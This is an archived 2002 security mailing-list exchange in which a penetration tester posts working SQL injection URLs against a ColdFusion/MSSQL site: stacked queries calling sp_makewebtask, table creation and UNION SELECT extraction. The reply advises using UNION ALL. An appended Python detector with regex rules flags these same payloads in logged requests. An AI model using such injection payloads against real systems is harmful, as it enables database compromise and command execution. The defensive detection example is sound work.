Re: SQL INJECTION IN Coldfusion

From: Cesar (cesarc56@yahoo.com)
Date: Fri Sep 13 2002 - 22:04:37 EDT


Hi.
You must use UNION ALL to get all the rows.

For new techniques take a look at this paper:

Manipulating MS Sql Server using sql injection.
http://www.appsecinc.com/news/briefing.html#inject

Cesar.

--- Mr Ro <vnmrro@yahoo.com> wrote:
> hello pen-tester,
> I am dealing with a pen-test against a CFM server with MSSQL as backend.
> It is vulnerable to direct SQL injection.
> I figured out that I can create, drop... table, execute xp_cmdshell,
> sp_makewebtask, so I submit:
> http://mysite/file.cfm?id=4546;exec sp_makewebtask "C:\winnt\temp\blah.htm","select * from master..sysmessages"--
> it's okay, and I want to get "C:\winnt\temp\blah.htm".
> I submit:
> http://mysite/file.cfm?id=4567;create table blah (line varchar(8000))--
> and then, I submit:
> http://mysite/file.cfm?id=4567 UNION SELECT line from mrro--
> it returns an error complaining that "All queries in an SQL statement
> containing a UNION operator must have an equal number of expressions in
> their target lists." so I keep adding "line" in my request url
> (http://mysite/file.cfm?id=4567 UNION SELECT line,line,line from mrro--),
> finally it returns an error message like this:
> "[Microsoft][ODBC SQL Server Driver][SQL Server]The text, ntext, or image
> data type cannot be selected as DISTINCT."
> question here: who can explain to me what happened?
>
> I know there is another way to download or upload files using "tftp", so
> is there any free "tftp" server for me to use instead of installing a new one?
> thanks for reading.
> best regards
> mrro

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
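
A detection-side view of the requests quoted above, as an added example that is not part of the original thread: it URL-decodes logged request targets and flags the markers those requests carry (a non-numeric `id`, a stacked statement after `;`, `UNION SELECT`, `sp_makewebtask`/`xp_cmdshell`, a trailing `--`). The rule names, the assumption that `id` is an integer parameter, and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Indicators taken from the requests quoted in this thread; the rule names are
# this example's own labels.
RULES = {
    "stacked_statement": re.compile(r";\s*(exec|execute|create|drop|insert|update|delete)\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "dangerous_proc": re.compile(r"\b(xp_cmdshell|sp_makewebtask)\b", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers

def parse_query(raw_query):
    """Split on '&' only, so a ';' inside a value stays visible, then decode."""
    pairs = {}
    for part in raw_query.split("&"):
        name, _, value = part.partition("=")
        # Decode twice so double-encoded payloads such as %253B are also seen.
        pairs[unquote_plus(name)] = unquote_plus(unquote_plus(value))
    return pairs

def inspect_request(request_target):
    """Return the sorted rule names that fire for one logged request target."""
    hits = set()
    for name, value in parse_query(urlsplit(request_target).query).items():
        # Type check: the highest-signal rule, independent of any SQL keyword.
        if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            hits.add("non_numeric_id")
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.add(rule)
    return sorted(hits)

# Constructed sample request targets (not real log data), modelled on the thread.
SAMPLE_TARGETS = [
    "/file.cfm?id=4546",
    "/file.cfm?id=4546;exec%20sp_makewebtask%20%22C:%5Cwinnt%5Ctemp%5Cblah.htm%22,"
    "%22select%20*%20from%20master..sysmessages%22--",
    "/file.cfm?id=4567%20UNION%20SELECT%20line,line,line%20from%20mrro--",
    "/file.cfm?id=4567%253Bcreate+table+blah+(line+varchar(8000))--",
    # Free-text field: the keyword rule fires, the type check does not.
    "/search.cfm?q=union+select+committee",
]

if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        print(inspect_request(target) or ["clean"], target)
```

The last sample shows why keyword rules alone are noisy on free-text parameters; the integer check on `id` is the signal to alert on, and the same check enforced server-side is what stops these requests.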



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:25 EDT